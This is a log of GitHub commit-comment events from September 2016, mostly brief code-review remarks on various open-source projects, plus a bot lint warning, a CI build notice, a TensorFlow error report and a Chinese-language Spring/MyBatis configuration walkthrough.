{"id":"4589277399","type":"CommitCommentEvent","actor":{"login":"covers1624"},"repo":{"name":"TheCBProject/CodeChickenLib"},"payload":{"comment":{"id":19095159,"position":null,"line":null,"path":null,"commit_id":"b1341d3ae9b5b0825ca90168151b589a883986fd","created_at":"2016-09-20T12:21:04Z","updated_at":"2016-09-20T12:21:04Z","body":"Ahh, ill add that."}},"created_at":"2016-09-20T12:21:04Z"}
{"id":"4589283844","type":"CommitCommentEvent","actor":{"login":"dereuromark"},"repo":{"name":"FriendsOfCake/search"},"payload":{"comment":{"id":19095170,"position":6,"line":38,"path":"src/Controller/Component/PrgComponent.php","commit_id":"82818bd853f2f06cb64298af5f52546c88686360","created_at":"2016-09-20T12:22:25Z","updated_at":"2016-09-20T12:22:25Z","body":"Yeah, all the same thing.\r\nI reverted it in https://github.com/FriendsOfCake/search/commit/45896eea9b7f78c4060fb0c3cbf4fda427082fcc to be consistent with the rest of the code, e.g.\r\n\r\n- loadFilter()\r\n- collection()\r\n- conversion()\r\n- _filterParams()\r\n- _actionCheck()\r\n\r\netc\r\n"}},"created_at":"2016-09-20T12:22:25Z"}
{"id":"4589285419","type":"CommitCommentEvent","actor":{"login":"sant0ro"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":19095176,"position":null,"line":null,"path":null,"commit_id":"b2a904df26fa8a303c7e01dd2b52666eadbf9fb7","created_at":"2016-09-20T12:22:45Z","updated_at":"2016-09-20T12:22:45Z","body":"The `BigIntegerMethods.cs` can be removed if we move to .NET 4.5.2 as discussed in #146 "}},"created_at":"2016-09-20T12:22:45Z"}
{"id":"4589288597","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/beastscriptr"},"payload":{"comment":{"id":19095184,"position":null,"line":null,"path":null,"commit_id":"10c2f3698bf57776be1a09ab8e54f388d2423ce3","created_at":"2016-09-20T12:23:24Z","updated_at":"2016-09-20T12:23:24Z","body":"[tests/testthat/test_beastscriptr.R:134:68:](https://github.com/richelbilderbeek/beastscriptr/blob/10c2f3698bf57776be1a09ab8e54f388d2423ce3/tests/testthat/test_beastscriptr.R#L134) *style:* **Commas should always have a space after.**\n```r\n​  output_xml_state_filename <- basename(paste0(output_xml_filename,\".state\"))\n                                                                   ^\n```"}},"created_at":"2016-09-20T12:23:24Z"}
{"id":"4589289706","type":"CommitCommentEvent","actor":{"login":"mirat-pl"},"repo":{"name":"daneden/animate.css"},"payload":{"comment":{"id":19095187,"position":null,"line":null,"path":null,"commit_id":"7e8be119593b4c6a294832b2b7a44f3b86df42fb","created_at":"2016-09-20T12:23:38Z","updated_at":"2016-09-20T12:23:38Z","body":"ok"}},"created_at":"2016-09-20T12:23:38Z"}
{"id":"4589296677","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":19095202,"position":17,"line":4397,"path":"server/CGameHandler.cpp","commit_id":"58f90b736bcd3cb0c966f217b700a92ae4e42ed7","created_at":"2016-09-20T12:25:04Z","updated_at":"2016-09-20T12:25:04Z","body":"gs->getPlayerTeam(fc.player) inside loop is even worse."}},"created_at":"2016-09-20T12:25:04Z"}
{"id":"4589298205","type":"CommitCommentEvent","actor":{"login":"yogev-stratoscale"},"repo":{"name":"Stratoscale/kubernetes-contrib"},"payload":{"comment":{"id":19095204,"position":null,"line":null,"path":null,"commit_id":"6f393749a1d2356f0bacb36dac9c622327b94e3f","created_at":"2016-09-20T12:25:23Z","updated_at":"2016-09-20T12:25:23Z","body":"@shay-stratoscale, @ravid-stratoscale\r\n\r\nDid you see this comment?\r\n\r\nPlease respond so i know you saw this\r\n\r\nThanks\r\n\r\n"}},"created_at":"2016-09-20T12:25:23Z"}
{"id":"4589299188","type":"CommitCommentEvent","actor":{"login":"Trakton"},"repo":{"name":"pet-informatica/CinQuest"},"payload":{"comment":{"id":19095206,"position":null,"line":null,"path":null,"commit_id":"f3eeff2a91e1fa2dc10ac81af361ff9548903716","created_at":"2016-09-20T12:25:37Z","updated_at":"2016-09-20T12:25:37Z","body":"Calegário, comenta cada método que tu criar com /// em cima dele, pra que fique tudo documentado."}},"created_at":"2016-09-20T12:25:37Z"}
{"id":"4589300444","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19095210,"position":54,"line":172,"path":"src/sliceDataStorage.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-20T12:25:52Z","updated_at":"2016-09-20T12:25:52Z","body":"Copy of `SliceDataStorage`?"}},"created_at":"2016-09-20T12:25:52Z"}
{"id":"4589303268","type":"CommitCommentEvent","actor":{"login":"Trakton"},"repo":{"name":"pet-informatica/CinQuest"},"payload":{"comment":{"id":19095217,"position":18,"line":25,"path":"Assets/Scripts/GameManager/Feedback.cs","commit_id":"f3eeff2a91e1fa2dc10ac81af361ff9548903716","created_at":"2016-09-20T12:26:28Z","updated_at":"2016-09-20T12:26:28Z","body":"Não esquece de colocar esse GameObject.Find(\"PauseManager\").GetComponent<Feedback>() como uma variável no topo do código, pra não precisar ficar chamando esse método toda vez"}},"created_at":"2016-09-20T12:26:28Z"}
{"id":"4589305633","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19095224,"position":18,"line":0,"path":"core/reflection.jvm/src/kotlin/reflect/jvm/internal/AnnotationConstructorCaller.kt","commit_id":"8c5c41f2c078812553071d03a1cbbf6b642828b9","created_at":"2016-09-20T12:26:59Z","updated_at":"2016-09-20T12:26:59Z","body":"`parameterNames.singleOrNull() == \"value\"` looks clearly to me"}},"created_at":"2016-09-20T12:26:59Z"}
{"id":"4589308852","type":"CommitCommentEvent","actor":{"login":"Kayleman"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19095232,"position":10,"line":76,"path":"docs/ContinuousIntegration.md","commit_id":"008aba7ca3f62a81dcc98f9e7f42d0fe33a00fb8","created_at":"2016-09-20T12:27:39Z","updated_at":"2016-09-20T12:27:39Z","body":"//lkjk"}},"created_at":"2016-09-20T12:27:39Z"}
{"id":"4589309204","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"pvalsecc/QGIS"},"payload":{"comment":{"id":19095233,"position":63,"line":3646,"path":"src/core/qgsexpression.cpp","commit_id":"c3be0d826c3ac39d9b7dfcf6c91537559a46f1f1","created_at":"2016-09-20T12:27:45Z","updated_at":"2016-09-20T12:27:45Z","body":"Looks good - will also need to add the aliases here too."}},"created_at":"2016-09-20T12:27:45Z"}
{"id":"4589309254","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19095234,"position":null,"line":null,"path":null,"commit_id":"3b70074de00491478ca32a2c24f4591e4409aea0","created_at":"2016-09-20T12:27:46Z","updated_at":"2016-09-20T12:27:46Z","body":"@pb00068 \r\n\r\n I think this brings us a slow-down, actually: I measure a 0.6% slow-down for the version where we have this test \r\n````\r\n  if (!stmAttackers)\r\n        return swapList[0];\r\n````\r\nboth in line 1006 and in line 1025 (as in the test currently running on fishtest),\r\ncompared to the version where we would have it only once in line 1025.\r\n\r\nI will try to optimize the new idea for speed even more (the lsb() in line 67\r\nis slow on 32-bits machines, can we avoid it, for example?) \r\n"}},"created_at":"2016-09-20T12:27:46Z"}
{"id":"4589312080","type":"CommitCommentEvent","actor":{"login":"koalatif"},"repo":{"name":"koalatif/datasciencecoursera"},"payload":{"comment":{"id":19095237,"position":null,"line":null,"path":null,"commit_id":"9bf2418e0f2ec56af4bafe7523f9d4dffbe04155","created_at":"2016-09-20T12:28:21Z","updated_at":"2016-09-20T12:28:21Z","body":"## This is a markdown file\r\n\r\n\r\n"}},"created_at":"2016-09-20T12:28:21Z"}
{"id":"4589316469","type":"CommitCommentEvent","actor":{"login":"ForNeVeR"},"repo":{"name":"morganey-lang/Morganey"},"payload":{"comment":{"id":19095250,"position":null,"line":null,"path":null,"commit_id":"2a02af80bdf72b0f02571b688d6cd5de865a9e65","created_at":"2016-09-20T12:29:15Z","updated_at":"2016-09-20T12:29:15Z","body":".\\ _________ /"}},"created_at":"2016-09-20T12:29:15Z"}
{"id":"4589321527","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19095260,"position":5,"line":0,"path":"core/reflection.jvm/src/kotlin/reflect/jvm/internal/FunctionCaller.kt","commit_id":"e7e54d571f49ddc0af2c0ca069ac1e52a8e7d676","created_at":"2016-09-20T12:30:16Z","updated_at":"2016-09-20T12:30:16Z","body":"I've thought about it but it only saves exactly one `!!` at the moment, so probably not worth it."}},"created_at":"2016-09-20T12:30:16Z"}
{"id":"4589322075","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"AlexFalappa/nb-springboot"},"payload":{"comment":{"id":19095261,"position":4,"line":24,"path":"src/main/resources/com/github/alexfalappa/nbspringboot/projects/initializr/Bundle.properties","commit_id":"06eebedb4fa5b18507b419c6e287d00ce57da436","created_at":"2016-09-20T12:30:22Z","updated_at":"2016-09-20T12:30:22Z","body":"@AlexFalappa fyi that user agent is now used in Spring Intializr to identify requests from NetBeans (see https://github.com/spring-io/initializr/issues/290). \r\n\r\nNothing to do on your side. If you decide to change the format, please let us know. Thanks!"}},"created_at":"2016-09-20T12:30:22Z"}
{"id":"4589323605","type":"CommitCommentEvent","actor":{"login":"rexim"},"repo":{"name":"morganey-lang/Morganey"},"payload":{"comment":{"id":19095270,"position":null,"line":null,"path":null,"commit_id":"2a02af80bdf72b0f02571b688d6cd5de865a9e65","created_at":"2016-09-20T12:30:39Z","updated_at":"2016-09-20T12:30:39Z","body":"How did you access a secret conversation?!"}},"created_at":"2016-09-20T12:30:39Z"}
{"id":"4589336369","type":"CommitCommentEvent","actor":{"login":"Youpiyouxian"},"repo":{"name":"Youpiyouxian/hello-world"},"payload":{"comment":{"id":19095311,"position":null,"line":null,"path":null,"commit_id":"03c01fb8ee65307fa7ae9d597c7f21cde2a2f716","created_at":"2016-09-20T12:33:16Z","updated_at":"2016-09-20T12:33:16Z","body":"gooe"}},"created_at":"2016-09-20T12:33:16Z"}
{"id":"4589336566","type":"CommitCommentEvent","actor":{"login":"claudiagrilli"},"repo":{"name":"claudiagrilli/RxAlamofire"},"payload":{"comment":{"id":19095312,"position":null,"line":null,"path":null,"commit_id":"d40f249deb6f4e92e60becffee4c485d634c82d1","created_at":"2016-09-20T12:33:18Z","updated_at":"2016-09-20T12:33:18Z","body":"Fix the issue: \r\nModule file's minimum deployment target is ios9.0 v9.0 in RxAlamofire.swift"}},"created_at":"2016-09-20T12:33:18Z"}
{"id":"4589336708","type":"CommitCommentEvent","actor":{"login":"ForNeVeR"},"repo":{"name":"morganey-lang/Morganey"},"payload":{"comment":{"id":19095313,"position":null,"line":null,"path":null,"commit_id":"2a02af80bdf72b0f02571b688d6cd5de865a9e65","created_at":"2016-09-20T12:33:19Z","updated_at":"2016-09-20T12:33:19Z","body":"I am an authorized person to access your secrets because of the fact mentioned in the secret message itself."}},"created_at":"2016-09-20T12:33:19Z"}
{"id":"4589344411","type":"CommitCommentEvent","actor":{"login":"garydux"},"repo":{"name":"codehaus-cargo/cargo"},"payload":{"comment":{"id":19095341,"position":null,"line":null,"path":null,"commit_id":"d612bf670252822f3ea52b8b9b226c1218bb624b","created_at":"2016-09-20T12:34:49Z","updated_at":"2016-09-20T12:34:49Z","body":"In AbstractWildFlyStandaloneLocalConfiguration.java the Method createApplicationRolesProperties should be implemented like createApplicationUsersProperties and createMgmtUsersProperties that:\r\n\r\n```\r\n    private void createApplicationRolesProperties()\r\n    {\r\n\t\t// Add token filters for authenticated users\r\n        if (!getUsers().isEmpty())\r\n        {\r\n        StringBuilder rolesToken = new StringBuilder(\r\n            \"# JBoss application-roles.properties file generated by CARGO\\n\");\r\n\r\n        for (User user : getUsers())\r\n        {\r\n            rolesToken.append(user.getName());\r\n            rolesToken.append(\"=\");\r\n            for (String role : user.getRoles())\r\n            {\r\n                rolesToken.append(role);\r\n                rolesToken.append(\",\");\r\n            }\r\n            rolesToken.append('\\n');\r\n        }\r\n\r\n        getFileHandler().writeTextFile(\r\n            getFileHandler().append(getHome(), \"/configuration/application-roles.properties\"),\r\n                rolesToken.toString(), \"UTF-8\");\r\n\t\t}\r\n    }\r\n```\r\notherwise it is inconsistent.\r\n\r\n"}},"created_at":"2016-09-20T12:34:49Z"}
{"id":"4589346293","type":"CommitCommentEvent","actor":{"login":"ADmad"},"repo":{"name":"FriendsOfCake/search"},"payload":{"comment":{"id":19095350,"position":6,"line":38,"path":"src/Controller/Component/PrgComponent.php","commit_id":"82818bd853f2f06cb64298af5f52546c88686360","created_at":"2016-09-20T12:35:13Z","updated_at":"2016-09-20T12:35:13Z","body":"Negations are not good for code readability. At the end of the day the paradigms are meant to make code more readable and maintainable, so they should be followed judiciously.\r\n\r\nThe `return null` is also unnecessary but I added it to stop phpcs from whining."}},"created_at":"2016-09-20T12:35:13Z"}
{"id":"4589348388","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19095355,"position":null,"line":null,"path":null,"commit_id":"45942fbb80bbce29858b58100f65771dafb05246","created_at":"2016-09-20T12:35:36Z","updated_at":"2016-09-20T12:35:36Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1064](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13622&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T12:35:36Z"}
{"id":"4589349719","type":"CommitCommentEvent","actor":{"login":"raniamlj"},"repo":{"name":"hardmaru/write-rnn-tensorflow"},"payload":{"comment":{"id":19095359,"position":null,"line":null,"path":null,"commit_id":"fedcfc375d54af47826147010936770abff91b7d","created_at":"2016-09-20T12:35:52Z","updated_at":"2016-09-20T12:35:52Z","body":"hi !\r\ni have downloaded the database and i have install tensorflow 8 \r\nwhen i  try to lanch train with \"  python train.py\"\r\ni get this error :\r\n--------------------------------------------------\r\nTraceback (most recent call last):\r\n  File \"/write-rnn-tensorflow-master/train.py\", line 74, in <module>\r\n    main()\r\n  File \"/write-rnn-tensorflow-master/train.py\", line 41, in main\r\n    train(args)\r\n  File \"/write-rnn-tensorflow-master/train.py\", line 49, in train\r\n    model = Model(args)\r\n  File \"/write-rnn-tensorflow-master/model.py\", line 18, in __init__\r\n    cell_fn = tf.nn.rnn_cell.BasicLSTMCell\r\nAttributeError: 'module' object has no attribute 'rnn_cell'\r\n----------------------------------------\r\nPlease help.\r\n"}},"created_at":"2016-09-20T12:35:52Z"}
{"id":"4589354638","type":"CommitCommentEvent","actor":{"login":"xKarloS2"},"repo":{"name":"timabbott/zulip"},"payload":{"comment":{"id":19095377,"position":null,"line":null,"path":null,"commit_id":"d084a35862d13356e1cf237ff36c44c97448c78f","created_at":"2016-09-20T12:36:53Z","updated_at":"2016-09-20T12:36:53Z","body":"Gj."}},"created_at":"2016-09-20T12:36:53Z"}
{"id":"4589355484","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19095380,"position":5,"line":40,"path":"src/SkirtBrim.cpp","commit_id":"92fca17411af6ba726c3933d4dc122495f3d8b09","created_at":"2016-09-20T12:37:03Z","updated_at":"2016-09-20T12:37:03Z","body":"Since you're adding `+ primary_line_count % 2`, that would round the line count up instead of down. If an odd number doesn't fit, an odd number + 1 still doesn't fit. I suggest you change that `+` into a `-`."}},"created_at":"2016-09-20T12:37:03Z"}
{"id":"4589356604","type":"CommitCommentEvent","actor":{"login":"amascan"},"repo":{"name":"amascan/magazin3"},"payload":{"comment":{"id":19095383,"position":null,"line":null,"path":null,"commit_id":"6b0b6fcf3da4514a4e330ae8f43aea687f4c874b","created_at":"2016-09-20T12:37:17Z","updated_at":"2016-09-20T12:37:17Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;zCm81KNq&#x2F;4-problema-magazin\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Problema Magazin</a>"}},"created_at":"2016-09-20T12:37:17Z"}
{"id":"4589357883","type":"CommitCommentEvent","actor":{"login":"dereuromark"},"repo":{"name":"FriendsOfCake/search"},"payload":{"comment":{"id":19095388,"position":6,"line":38,"path":"src/Controller/Component/PrgComponent.php","commit_id":"82818bd853f2f06cb64298af5f52546c88686360","created_at":"2016-09-20T12:37:31Z","updated_at":"2016-09-20T12:37:31Z","body":"Well, and there is your flaw: The return null should never be at the end, since it is in a clean code way used to return early. Please look at all the rest of the code, it is all properly doing what I said. Your change was really not a very nice cowboy move here."}},"created_at":"2016-09-20T12:37:31Z"}
{"id":"4589359551","type":"CommitCommentEvent","actor":{"login":"huangxingl"},"repo":{"name":"huangxingl/PersonalPractice"},"payload":{"comment":{"id":19095395,"position":null,"line":null,"path":null,"commit_id":"b372c9f80532ce915038bc3e1abc1189ac568d95","created_at":"2016-09-20T12:37:52Z","updated_at":"2016-09-20T12:37:52Z","body":"创建Maven项目，在spring中整合mybaties\r\n\r\npom.xml配置，需要导入jar包：\r\n\r\n<project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd\">\r\n  <modelVersion>4.0.0</modelVersion>\r\n  <groupId>com.zp</groupId>\r\n  <artifactId>test2</artifactId>\r\n  <version>0.0.1-SNAPSHOT</version>\r\n  <packaging>war</packaging>\r\n\r\n   <dependencies>\r\n   \r\n   <!-- 依赖servlet，导入servlet所需jar包  --> \r\n    <dependency>\r\n      <groupId>javax.servlet</groupId>\r\n      <artifactId>javax.servlet-api</artifactId>\r\n      <version>3.0.1</version>\r\n      <scope>provided</scope>\r\n    </dependency>\r\n    \r\n    <!-- 依赖spring，导入spring所需jar包  --> \r\n    <dependency>  \r\n        <groupId>org.springframework</groupId>  \r\n        <artifactId>spring-context</artifactId>  \r\n        <version>4.0.0.RELEASE</version>  \r\n    </dependency>\r\n    <dependency>\r\n        <groupId>org.springframework</groupId>\r\n        <artifactId>spring-web</artifactId>\r\n        <version>4.0.2.RELEASE</version>\r\n    </dependency>\r\n    <dependency>\r\n        <groupId>org.springframework</groupId>\r\n        <artifactId>spring-tx</artifactId>\r\n        <version>4.0.2.RELEASE</version>\r\n    </dependency>\r\n    <dependency>\r\n        <groupId>org.springframework</groupId>\r\n        <artifactId>spring-webmvc</artifactId>\r\n        <version>4.0.2.RELEASE</version>\r\n    </dependency>\r\n    <dependency>\r\n        <groupId>org.springframework.data</groupId>\r\n        <artifactId>spring-data-jpa</artifactId>\r\n        <version>1.9.2.RELEASE</version>\r\n    </dependency>\r\n    \r\n    <!-- URL重写filter,用于将访问静态资源http://localhost/foo.css　转为http://localhost/static/foo.css -->\r\n    <dependency>\r\n         <groupId>org.tuckey</groupId>\r\n         <artifactId>urlrewritefilter</artifactId>\r\n         <version>4.0.4</version>\r\n    </dependency>\r\n    \r\n    <!-- json的jar包 -->\r\n    <dependency>\r\n        <groupId>org.codehaus.jackson</groupId>\r\n        <artifactId>jackson-core-asl</artifactId>\r\n        <version>1.9.11</version>\r\n    </dependency>\r\n    \r\n    <dependency>\r\n        <groupId>org.codehaus.jackson</groupId>\r\n        <artifactId>jackson-mapper-asl</artifactId>\r\n        <version>1.9.12</version>\r\n    </dependency>\r\n    \r\n    <!-- 数据库连接所需jar包 -->\r\n    <dependency>\r\n        <groupId>commons-dbcp</groupId>\r\n        <artifactId>commons-dbcp</artifactId>\r\n        <version>1.4</version>\r\n    </dependency>\r\n    <dependency>\r\n        <groupId>commons-pool</groupId>\r\n        <artifactId>commons-pool</artifactId>\r\n        <version>1.6</version>\r\n    </dependency>\r\n    <!-- 阿里巴巴公司开发的Druid数据库连接池 -->\r\n    <dependency>\r\n        <groupId>com.alibaba</groupId>\r\n        <artifactId>druid</artifactId>\r\n        <version>1.0.16</version>\r\n      </dependency>\r\n    \r\n    \r\n    <!-- mybatis核心包 -->\r\n    <dependency>\r\n        <groupId>org.mybatis</groupId>\r\n        <artifactId>mybatis</artifactId>\r\n        <version>3.1.1</version>\r\n    </dependency>\r\n    \r\n    <!-- mybatis/spring包 -->\r\n    <dependency>\r\n            <groupId>org.mybatis</groupId>\r\n            <artifactId>mybatis-spring</artifactId>\r\n            <version>1.2.2</version>\r\n        </dependency>\r\n        \r\n    <!-- Mysql驱动包 -->    \r\n    <dependency>\r\n        <groupId>mysql</groupId>\r\n        <artifactId>mysql-connector-java</artifactId>\r\n        <version>5.1.27</version>\r\n    </dependency>\r\n    \r\n   </dependencies>\r\n  \r\n    <build>\r\n    <plugins>\r\n       <!-- 声明jdk编译版本1.7  -->\r\n       <plugin>\r\n        <groupId>org.apache.maven.plugins</groupId>\r\n        <artifactId>maven-compiler-plugin</artifactId>\r\n          <version>3.1</version>\r\n         <configuration>\r\n              <source>1.7</source>\r\n              <target>1.7</target>\r\n         </configuration>\r\n      </plugin>\r\n      <!-- tomcat插件 -->\r\n      <plugin>\r\n        <groupId>org.apche.tomcat.maven</groupId>\r\n        <artifactId>tomcat7-maven-plugin</artifactId>\r\n        <version>2.2</version>\r\n      </plugin>\r\n    </plugins>\r\n  </build>\r\n</project>\r\n_____________________________________________________________________________________________________________\r\napplicationContext.xml的配置：\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<beans xmlns=\"http://www.springframework.org/schema/beans\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n    xmlns:context=\"http://www.springframework.org/schema/context\" xmlns:util=\"http://www.springframework.org/schema/util\"  \r\n    xmlns:aop=\"http://www.springframework.org/schema/aop\" xmlns:tx=\"http://www.springframework.org/schema/tx\"\r\n    xmlns:jpa=\"http://www.springframework.org/schema/data/jpa\" xmlns:mvc=\"http://www.springframework.org/schema/mvc\"\r\n    xsi:schemaLocation=\"\r\n        http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-4.0.xsd\r\n        http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-4.0.xsd\r\n        http://www.springframework.org/schema/util http://www.springframework.org/schema/util/spring-util-4.0.xsd\r\n        http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-4.0.xsd\r\n        http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx-4.0.xsd\r\n        http://www.springframework.org/schema/data/jpa http://www.springframework.org/schema/data/jpa/spring-jpa-1.9.xsd\r\n        http://www.springframework.org/schema/mvc http://www.springframework.org/schema/mvc/spring-mvc-4.0.xsd\">\r\n    \r\n    <bean id=\"dbcp\" class=\"com.alibaba.druid.pool.DruidDataSource\" init-method=\"init\" destroy-method=\"close\">\r\n        <property name=\"username\" value=\"root\">\r\n        </property>\r\n        <property name=\"password\" value=\"123\">\r\n        </property>\r\n        <property name=\"driverClassName\" value=\"com.mysql.jdbc.Driver\">\r\n        </property>\r\n        <property name=\"url\" value=\"jdbc:mysql://localhost:3306/OrderDatabase?characterEncoding=utf8\">\r\n        </property>\r\n        \r\n        <!-- 连接初始值，连接池启动时创建的连接数量的初始值 -->\r\n        <property name=\"initialSize\"><value>4</value></property>  \r\n        <!-- 连接池的最大值，同一时间可以从池分配的最多连接数量，0时无限制 -->\r\n        <property name=\"maxActive\"><value>100</value></property>\r\n        <!-- 最大空闲值.当经过一个高峰时间后，连接池可以慢慢将已经用不到的连接慢慢释放一部分，一直减少到maxIdle为止 ，0时无限制-->\r\n        <property name=\"maxIdle\"><value>50</value></property>\r\n        <!-- 最小空闲值.当空闲的连接数少于阀值时，连接池就会预申请去一些连接，以免洪峰来时来不及申请 -->\r\n        <property name=\"minIdle\"><value>15</value></property> \r\n        <!-- 配置获取连接等待超时的时间 -->  \r\n        <property name=\"maxWait\"><value>10000</value></property><!-- 最大等待时间 -->  \r\n        <!-- 配置间隔多久才进行一次检测，检测需要关闭的空闲连接，单位是毫秒 -->  \r\n        <property name=\"timeBetweenEvictionRunsMillis\"><value>60000</value></property>  \r\n        <!-- 配置一个连接在池中最小生存的时间，单位是毫秒 -->  \r\n        <property name=\"minEvictableIdleTimeMillis\"><value>300000</value></property>  \r\n        \r\n    </bean>\r\n    \r\n    <!-- 设置sqlsession工厂 -->\r\n    <bean id=\"sqlsessionfactory\" \r\n        class=\"org.mybatis.spring.SqlSessionFactoryBean\">\r\n        <property name=\"dataSource\" \r\n                ref=\"dbcp\">\r\n        </property>\r\n        <property name=\"mapperLocations\" \r\n                value=\"classpath:com/zp/test/sql/*.xml\">\r\n        </property>\r\n    </bean>\r\n    \r\n    <!-- DAO层 -->\r\n    <bean class=\"org.mybatis.spring.mapper.MapperScannerConfigurer\">\r\n        <property name=\"basePackage\" \r\n                value=\"com.zp.test.dao\">\r\n        </property>\r\n    </bean>\r\n    \r\n    <!-- viewresolver 视图解析器-->\r\n    <bean class=\"org.springframework.web.servlet.view.InternalResourceViewResolver\">\r\n        <property name=\"prefix\" value=\"/WEB-INF/jsp/\">\r\n        </property>\r\n        <property name=\"suffix\" value=\".jsp\">\r\n        </property>\r\n    </bean>\r\n\r\n    <!-- 扫描service,controller -->\r\n    <context:component-scan \r\n        base-package=\"com.zp.test\"/>\r\n\r\n    <!-- handlermapping @RequestMapping,\r\n    @ResponseBody,@ExceptionHanlder -->\r\n    <mvc:annotation-driven/>\r\n    \r\n    <!-- Spring事务管理 -->\r\n    <!-- 定义事务管理(共通处理)组件 -->\r\n    <bean id=\"tx\" \r\n        class=\"org.springframework.jdbc.datasource.DataSourceTransactionManager\">\r\n        <!-- 必须注入dataSource连接资源 -->\r\n        <property name=\"dataSource\" ref=\"dbcp\">\r\n        </property>\r\n    </bean>\r\n    <!-- 启动@Transactional注解,将来哪个组件方法\r\n    带有该标记就会切入tx事务管理功能 -->\r\n    <tx:annotation-driven transaction-manager=\"tx\"/>    \r\n</beans>\r\n____________________________________________________________________________________________________________\r\n\r\nweb.xml配置\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<web-app xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n    xmlns=\"http://java.sun.com/xml/ns/javaee\"\r\n    xsi:schemaLocation=\"http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd\"\r\n    id=\"schedule-console\" version=\"3.0\">\r\n  \r\n  <!-- 配置spring的servlet --> \r\n  <servlet>\r\n    <servlet-name>springmvc</servlet-name>\r\n    <servlet-class>\r\norg.springframework.web.servlet.DispatcherServlet\r\n    </servlet-class>\r\n    <init-param>\r\n      <param-name>contextConfigLocation</param-name>\r\n      <param-value>/WEB-INF/applicationContext.xml</param-value>\r\n    </init-param>\r\n    <load-on-startup>1</load-on-startup>\r\n  </servlet>\r\n<!--　覆盖default　servlet的/,　springmvc　servlet将处理原来处理静态资源的映射　-->\r\n<servlet-mapping>\r\n<servlet-name>springmvc</servlet-name>\r\n<url-pattern>/</url-pattern>\r\n</servlet-mapping>\r\n  \r\n<!--　该servlet为tomcat,jetty等容器提供,将静态资源映射从/改为/static/目录，如原来访问　http://localhost/foo.css　,现在http://localhost/static/foo.css　-->\r\n<servlet-mapping>\r\n<servlet-name>default</servlet-name>\r\n<url-pattern>/static/*</url-pattern>\r\n</servlet-mapping>\r\n  \r\n<!--　URL重写filter,用于将访问静态资源http://localhost/foo.css　转为http://localhost/static/foo.css　-->\r\n<filter>\r\n<filter-name>UrlRewriteFilter</filter-name>\r\n<filter-class>org.tuckey.web.filters.urlrewrite.UrlRewriteFilter</filter-class>\r\n<init-param>\r\n<param-name>confReloadCheckInterval</param-name>\r\n<param-value>60</param-value>\r\n</init-param>\r\n<init-param>\r\n<param-name>logLevel</param-name>\r\n<param-value>DEBUG</param-value>\r\n</init-param>\r\n</filter>\r\n\r\n<!--　浏览器不支持put,delete等method,由该filter将/blog?_method=delete转换为标准的http　delete方法　-->\r\n<filter>\r\n<filter-name>HiddenHttpMethodFilter</filter-name>\r\n<filter-class>org.springframework.web.filter.HiddenHttpMethodFilter</filter-class>\r\n</filter>\r\n\r\n<filter-mapping>\r\n<filter-name>HiddenHttpMethodFilter</filter-name>\r\n<servlet-name>springmvc</servlet-name>\r\n</filter-mapping>\r\n  \r\n    <!-- Spring的log4j监听器 -->  \r\n    <listener>  \r\n        <listener-class>org.springframework.web.util.Log4jConfigListener</listener-class>  \r\n    </listener>  \r\n    \r\n    <!-- 字符集 过滤器  -->  \r\n    <filter>  \r\n        <filter-name>CharacterEncodingFilter</filter-name>  \r\n        <filter-class>org.springframework.web.filter.CharacterEncodingFilter</filter-class>  \r\n        <init-param>  \r\n            <param-name>encoding</param-name>  \r\n            <param-value>UTF-8</param-value>  \r\n        </init-param>  \r\n        <init-param>  \r\n            <param-name>forceEncoding</param-name>  \r\n            <param-value>true</param-value>  \r\n        </init-param>  \r\n    </filter>  \r\n    <filter-mapping>  \r\n        <filter-name>CharacterEncodingFilter</filter-name>  \r\n        <url-pattern>/*</url-pattern>  \r\n    </filter-mapping>\r\n    \r\n  <!-- 欢迎页 -->\r\n  <welcome-file-list>\r\n    <welcome-file>index.jsp</welcome-file>\r\n  </welcome-file-list>\r\n  \r\n  <!-- 设置session有效时间 -->\r\n  <session-config>  \r\n  <session-timeout>9999</session-timeout>  \r\n</session-config>\r\n    \r\n    </web-app>"}},"created_at":"2016-09-20T12:37:52Z"}
